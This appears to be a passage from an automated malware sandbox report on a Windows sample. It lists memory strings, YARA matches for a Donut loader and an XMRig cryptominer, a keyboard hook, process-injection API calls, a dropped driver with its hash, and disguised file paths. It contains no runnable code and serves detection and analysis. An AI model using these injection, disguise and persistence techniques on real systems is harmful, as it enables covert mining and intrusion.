Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory, 10_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D18 NtWriteVirtualMemory, 10_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_004019D8 NtCreateThreadEx, 10_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D98 NtProtectVirtualMemory, 10_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401C98 NtClose, 10_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D58 NtAllocateVirtualMemory, 31_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D18 NtWriteVirtualMemory, 31_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_004019D8 NtCreateThreadEx, 31_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D98 NtProtectVirtualMemory, 31_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401C98 NtClose, 31_2_00401C98
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 94_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 95_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 97_2_0000000140001868
Creates driver files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Deletes files inside the Windows folder
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_3fc24ylm.ndk.ps1
Detected potential crypto function
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430540 1_2_00007FF7C1430540
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430B40 1_2_00007FF7C1430B40
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430508 1_2_00007FF7C1430508
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C143089D 1_2_00007FF7C143089D
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430500 1_2_00007FF7C1430500
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91B23F0 18_3_0000025EE91B23F0
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91BCC94 18_3_0000025EE91BCC94
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91BCE18 18_3_0000025EE91BCE18
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C9CC94 19_3_000001AD31C9CC94
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C923F0 19_3_000001AD31C923F0
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C9CE18 19_3_000001AD31C9CE18
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E106 20_2_00000113DB11E106
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E4D6 20_2_00000113DB11E4D6
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E90E 20_2_00000113DB11E90E
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11D4D2 20_2_00000113DB11D4D2
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11ED6A 20_2_00000113DB11ED6A
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D50F6 20_2_00007FF7C14D50F6
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D5EA2 20_2_00007FF7C14D5EA2
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E4D6 30_2_0000021E7B55E4D6
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E106 30_2_0000021E7B55E106
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55ED6A 30_2_0000021E7B55ED6A
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55D4D2 30_2_0000021E7B55D4D2
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E90E 30_2_0000021E7B55E90E
Source: C:\Windows\System32\conhost.exe Code function: 30_2_00007FF7C14E50F6 30_2_00007FF7C14E50F6
Source: C:\Windows\System32\conhost.exe Code function: 30_2_00007FF7C14E5EA2 30_2_00007FF7C14E5EA2
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DCCE18 36_3_00000236C6DCCE18
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DC23F0 36_3_00000236C6DC23F0
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DCCC94 36_3_00000236C6DCCC94
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E723F0 44_3_0000015829E723F0
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E7CE18 44_3_0000015829E7CE18
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E7CC94 44_3_0000015829E7CC94
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A6CE18 45_3_000001D643A6CE18
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A6CC94 45_3_000001D643A6CC94
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A623F0 45_3_000001D643A623F0
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063182CE18 58_3_000002063182CE18
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063182CC94 58_3_000002063182CC94
Source: C:\Windows\System32\conhost.exe Code function: 58_3_00000206318223F0 58_3_00000206318223F0
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE36423F0 69_3_000001CCE36423F0
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE364CE18 69_3_000001CCE364CE18
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE364CC94 69_3_000001CCE364CC94
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA1CC94 70_3_000001858EA1CC94
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA123F0 70_3_000001858EA123F0
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA1CE18 70_3_000001858EA1CE18
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBECE18 73_3_000002942EBECE18
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBE23F0 73_3_000002942EBE23F0
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBECC94 73_3_000002942EBECC94
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A038CE18 83_3_000001C8A038CE18
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A03823F0 83_3_000001C8A03823F0
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A038CC94 83_3_000001C8A038CC94
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF03CC94 87_3_000001E5EF03CC94
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF0323F0 87_3_000001E5EF0323F0
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF03CE18 87_3_000001E5EF03CE18
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001CF0 94_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002D4C 94_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001274 94_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002434 94_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140003204 94_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001CF0 95_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002D4C 95_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001274 95_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002434 95_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140003204 95_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD62323F0 96_3_000002ADD62323F0
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD623CC94 96_3_000002ADD623CC94
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD623CE18 96_3_000002ADD623CE18
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001CF0 97_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002D4C 97_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001274 97_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002434 97_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140003204 97_2_0000000140003204
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE5CE18 99_3_0000021C0EE5CE18
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE5CC94 99_3_0000021C0EE5CC94
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE523F0 99_3_0000021C0EE523F0
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC603823F0 101_3_000001FC603823F0
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6038CC94 101_3_000001FC6038CC94
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6038CE18 101_3_000001FC6038CE18
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C734CC94 103_3_00000161C734CC94
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C73423F0 103_3_00000161C73423F0
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C734CE18 103_3_00000161C734CE18
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
One or more processes crash
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
Uses 32bit PE files
Source: e7WMhx18XN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5434
Source: unknown Process created: Commandline size = 5297
Source: unknown Process created: Commandline size = 5277
Source: unknown Process created: Commandline size = 5288
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Yara signature match
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
